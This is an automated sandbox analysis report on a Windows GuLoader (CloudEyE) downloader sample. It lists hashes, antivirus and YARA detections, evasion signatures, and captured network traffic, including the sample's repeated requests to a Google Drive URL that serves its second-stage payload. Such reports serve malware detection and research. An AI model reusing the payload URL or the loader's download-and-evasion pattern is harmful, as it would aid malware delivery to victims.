Windows Analysis Report
Osb7hkGfAb.exe

Overview

General Information

Sample name: Osb7hkGfAb.exe
renamed because original name is a hash value
Original sample name: ad1dfc910b1815aea7983124549d2c04376db9b2249b99e3e672b91df91bfec6.exe
Analysis ID: 1587621
MD5: a09950fd9af3c4e3ff6f778ab5d8ce0f
SHA1: 043462f3e5a9b3133908c39e6c3fd8a4f0cade1b
SHA256: ad1dfc910b1815aea7983124549d2c04376db9b2249b99e3e672b91df91bfec6
Tags: exe, user-adrian__luca

Detection

GuLoader
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Osb7hkGfAb.exe (PID: 7784 cmdline: "C:\Users\user\Desktop\Osb7hkGfAb.exe" MD5: A09950FD9AF3C4E3FF6F778AB5D8CE0F)
    • Osb7hkGfAb.exe (PID: 5680 cmdline: "C:\Users\user\Desktop\Osb7hkGfAb.exe" MD5: A09950FD9AF3C4E3FF6F778AB5D8CE0F)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

No configs have been found

Source | Rule | Description | Author | Strings
00000000.00000002.2638880242.0000000002A86000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000008.00000002.2637639337.00000000017C6000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T15:54:59.027407+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49711 | 142.250.184.206 | 443 | TCP

AV Detection

Source: Osb7hkGfAb.exe, Avira: detected
Source: Osb7hkGfAb.exe, Virustotal: Detection: 68%
Source: Osb7hkGfAb.exe, ReversingLabs: Detection: 75%
Source: Submited Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: Osb7hkGfAb.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Osb7hkGfAb.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: mshtml.pdb source: Osb7hkGfAb.exe, 00000008.00000001.2028190142.0000000000649000.00000008.00000001.01000000.00000007.sdmp
Source: Binary string: mshtml.pdbUGP source: Osb7hkGfAb.exe, 00000008.00000001.2028190142.0000000000649000.00000008.00000001.01000000.00000007.sdmp
Source: C:\Users\user\Desktop\Osb7hkGfAb.exe, Code function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
Source: C:\Users\user\Desktop\Osb7hkGfAb.exe, Code function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
Source: C:\Users\user\Desktop\Osb7hkGfAb.exe, Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49711 -> 142.250.184.206:443
Source: global traffic, HTTP traffic detected:
  GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  Host: drive.google.com
  Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
  GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  Cache-Control: no-cache
  Host: drive.usercontent.google.com
  Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
  GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  Host: drive.google.com
  Cache-Control: no-cache
  Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
Source: global traffic, HTTP traffic detected:
  GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  Cache-Control: no-cache
  Host: drive.usercontent.google.com
  Connection: Keep-Alive
  Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global traffic
      DNS traffic detected: DNS query: drive.google.com
      Source: global traffic
      DNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTOxKKgv0yqzSLoegjtDuFz8wG_4tUO9ZVxnyZ1AfQolu7Ta0Y7LzJkmzzFWj-wtHB6Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:54:59 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-t114D-0_h5tx6l17ENxXPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerSet-Cookie: 
NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI; expires=Sat, 12-Jul-2025 14:54:59 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQq3kgsiWJfFbHzE-ofbyjbul2Dr1f4-OgcB0uXXSlFyMkApjy5nVwj0PFeW0imsTKDtL6_GG8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:55:02 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce--fKHTpzmTtkfK_LMx4XT6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQw9k5PSPHYoGsrDsuuse-WYQLdR1cbQHAaMkg6KwNM7OmtwCxzbc5qBUAOQ5qdvtgh1Tf9X48Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:55:04 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-OwO8ORBeJ2epaT6YjiGrjQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4tzc24yzZPWi4Zdo8IjJ5RaZU4FGehLnWjnm-O-y_RJBpWVbVM3Iwa7NteBPeFaXu7ieKkJbIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:55:07 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-GUqHkR93St__dVAqsdPTHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQqrI4IVWBzUsNQSvKtxRIzBckrnSsKn8Csvr3rPIoUeivs7ZRs3nA6G9QyEvpYC61_Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:55:09 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-36pnhRGuC8USUQf-rt4aIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRgZ3RkjCrev2TC2HEZqX0X_FWf6FSrblBlaJX1kZc9eJN-dePm_7mM8rXdIrICzJoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:55:11 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-KKXYcqXbDpC2lPjPfgcleg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: Osb7hkGfAb.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: Osb7hkGfAb.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: Osb7hkGfAb.exe, 00000008.00000001.2028190142.0000000000649000.00000008.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: Osb7hkGfAb.exe, 00000008.00000001.2028190142.00000000005F2000.00000008.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: Osb7hkGfAb.exe, 00000008.00000001.2028190142.00000000005F2000.00000008.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: Osb7hkGfAb.exe, 00000008.00000003.2409999678.0000000002E68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
      Source: Osb7hkGfAb.exe, 00000008.00000003.2234774627.0000000002E15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=d
      Source: Osb7hkGfAb.exe, 00000008.00000003.2361862879.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2234774627.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2409999678.0000000002E68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
      Source: Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2444083182.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2222132435.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2467614034.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2384044214.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2293552393.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2478681902.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2305365714.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2338323093.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2421966346.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2502617431.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2491797789.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2432644762.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2410044735.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2271097553.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2316016374.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2327402583.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2351154221.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, 
Osb7hkGfAb.exe, 00000008.00000003.2398929460.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2373546793.0000000002E1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadN
      Source: Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2444083182.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2222132435.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2153099213.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2467614034.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2384044214.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2293552393.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2165382798.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2176353373.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2142180181.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2188217884.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2478681902.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2305365714.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2338323093.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2210750583.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2130363069.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2421966346.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2432644762.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, 
Osb7hkGfAb.exe, 00000008.00000003.2410044735.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2104491856.0000000002E1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadR
      Source: Osb7hkGfAb.exe, 00000008.00000003.2104723095.0000000002E1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadU
      Source: Osb7hkGfAb.exe, 00000008.00000003.2142180181.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2478681902.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2502617431.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2491797789.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2454894175.0000000002E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloada
